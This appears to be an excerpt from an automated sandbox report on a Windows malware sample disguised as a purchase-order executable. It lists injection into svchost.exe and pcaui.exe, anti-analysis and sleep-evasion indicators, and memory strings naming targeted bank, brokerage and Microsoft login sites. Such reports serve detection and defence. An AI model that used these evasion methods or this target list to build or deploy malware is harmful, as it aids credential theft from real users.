                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02487A64 push ecx; ret 2_2_02487A78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0248EA38 push eax; retf 2_2_0248EA4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024872D4 pushad ; retf 2_2_0248726B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0248EA8D push esp; retf 2_2_0248EA8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024730C0 push eax; ret 2_2_024730C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0247D0E4 push edx; retf 2_2_0247D0E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0247808C push esp; ret 2_2_02478097
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02486797 push ds; iretd 2_2_024867A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00448111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00448111
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003FEB42
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0040123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040123A
                Source: C:\Users\user\Desktop\PO #2411071822.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\PO #2411071822.exeAPI/Special instruction interceptor: Address: D791F4
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Users\user\Desktop\PO #2411071822.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94181
                Source: C:\Users\user\Desktop\PO #2411071822.exeAPI coverage: 4.1 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 2076Thread sleep count: 48 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 2076Thread sleep time: -96000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe TID: 1848Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe TID: 1848Thread sleep time: -40500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00426CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00426CA9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004260DD
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004263F9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0042EB60
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042F56F FindFirstFileW,FindClose,0_2_0042F56F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0042F5FA
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00431B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431B2F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00431C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431C8A
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00431F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00431F94
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003FDDC0
                Source: 72Z53078.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 72Z53078.4.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 72Z53078.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: pcaui.exe, 00000004.00000002.3894074077.000000000875F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - EU WestVMware20,11696428655n
                Source: 72Z53078.4.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: olMdMEBIcgVB.exe, 00000006.00000002.3891744376.000000000100F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 72Z53078.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 72Z53078.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 72Z53078.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 72Z53078.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 72Z53078.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000007.00000002.2454773761.000001B66134C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
                Source: 72Z53078.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 72Z53078.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 72Z53078.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: pcaui.exe, 00000004.00000002.3894074077.000000000875F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: smartscreen_malvertising_blocks_counterINTEGERrokers - EU WestVMware20,11696428655n
                Source: 72Z53078.4.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 72Z53078.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 72Z53078.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 72Z53078.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 72Z53078.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 72Z53078.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 72Z53078.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\PO #2411071822.exeAPI call chain: ExitProcess graph end nodegraph_0-93704
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02487983 LdrLoadDll,2_2_02487983
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00436AAF BlockInput,0_2_00436AAF
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_003E3D19
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00413920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00413920
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FE01E LoadLibraryA,GetProcAddress,0_2_003FE01E
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00D794C0 mov eax, dword ptr fs:[00000030h]0_2_00D794C0
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00D79460 mov eax, dword ptr fs:[00000030h]0_2_00D79460
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00D77E10 mov eax, dword ptr fs:[00000030h]0_2_00D77E10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
